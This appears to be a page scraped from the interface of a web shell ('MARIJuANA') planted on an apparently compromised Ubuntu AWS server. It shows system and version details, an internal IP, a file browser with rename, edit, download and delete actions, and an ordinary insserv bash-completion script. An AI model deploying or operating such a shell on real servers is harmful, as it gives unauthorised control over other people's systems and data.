MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux ip-172-26-15-81 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
  SOFT : Apache/2.4.41 (Ubuntu) PHP : 7.4.3-4ubuntu2.29
/snap/core/17210/etc/bash_completion.d/
172.26.15.81

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
insserv 0.719 KB -rw-r--r-- 2013-05-07 06:07 R E G D
REQUEST EXIT
# insserv(8) completion # # Copyright (c) 2009 Kel Modderman # have insserv && _insserv() { local cur prev sysvdir services options cur=`_get_cword` prev=${COMP_WORDS[COMP_CWORD-1]} [ -d /etc/rc.d/init.d ] && sysvdir=/etc/rc.d/init.d \ || sysvdir=/etc/init.d services=( $(echo $sysvdir/!(README*|*.dpkg*|*.rpm@(orig|new|save))) ) services=( ${services[@]#$sysvdir/} ) options=( -c --config -d -f -n -o --override -p --path -r -v ) case "$prev" in -c|--config) _filedir ;; -o|--override|-p|--path) _filedir -d ;; *) COMPREPLY=( $( compgen -W '${options[@]} ${services[@]}' -- \ $cur ) ) ;; esac return 0 } && complete -F _insserv insserv